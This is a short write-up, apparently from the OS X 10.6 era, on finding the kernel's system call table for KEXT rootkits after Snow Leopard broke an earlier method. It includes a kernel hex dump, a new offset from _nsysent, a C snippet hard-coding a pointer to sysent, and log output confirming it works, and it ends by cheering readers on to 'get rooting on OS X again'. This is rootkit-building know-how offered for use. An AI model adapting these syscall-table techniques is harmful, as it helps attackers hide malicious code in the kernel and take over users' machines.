Finding sysent on OS X 10.6.1 Written by Braeden Thomas Regards to the gods of OS X security-dev nemo, Landon Fuller and many others Darwin Kernel Version 10.0.0: root:xnu-1456.1.25~1/RELEASE_I386 i386 The latest release from Apple (Snow Leopard) or 10.6.1 has broken most 10.5.* KEXT rootkits, primarily because the method provided by Landon Fuller has either been fixed by Apple or I have done something catastrophically wrong. I'm assuming there has been a problem with Apple implementing their KPI interfaces for Kernel Development so I'm just going to say for now that a static pointer may be the only option [as far as I know at this point]. A quick search through the kernel presents us with a slightly different organisation of the sysent table with reference to the Landon Fuller technique (32 bytes from _nsysent export). $ otool -d /mach_kernel 0082f020 00 00 00 00 ed 1e 49 00 00 00 00 00 00 00 00 00 0082f030 01 00 00 00 00 00 00 00 01 00 00 00 72 78 47 00 0082f040 b0 f0 4e 00 00 00 00 00 00 00 00 00 04 00 00 00 0082f050 00 00 00 00 74 95 47 00 00 00 00 00 00 00 00 00 00000000 *********************************************** 00831870 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 It's now located at -0x2850 from the _nsysent symbol. You'll notice _nosys (0x00491eed) and _exit (0x00477872) can be found here, the sysent table in 10.6.1 has 430 (0x01ae) syscalls in total. And here's for the magic code, that isn't really magic - primarily because it provides no sanity checks whatsoever. OS X kernel panic is baaahd. /* $ sysent.c */ /* $ Static Pointer to sysent on OS X 10.6.1 */ /* $ root:xnu-1456.1.25~1/RELEASE_I386 i386 */ #include "osxrt.h" #define _NSYSENT_OSX_10_6_1_ 0x00831870 #define _NOSYS_OSX_10_6_1_ 0x2850 static struct sysent *_sysent = ( struct sysent * )( _NSYSENT_OSX_10_6_1_ - _NOSYS_OSX_10_6_1_ ); /* $ EOF */ A simple sanity check would be just to check a few rows of the array and verify whether the value return from sy_narg corresponds with the amount of arguments that - that specific syscall actually has. It hath been found, once again! $ tail -f /var/log/kernel.log Sep 22 21:18:13 Homeground kernel[0]: _sysent: 0x82f020 Sep 22 21:18:13 Homeground kernel[0]: lstat64: 0x2e4ba3 2 Sep 22 21:18:13 Homeground kernel[0]: chdir: 0x2e89f3 1 So get rooting on OS X again, 2.6.* and Win32 isn't allowed to have all the fun.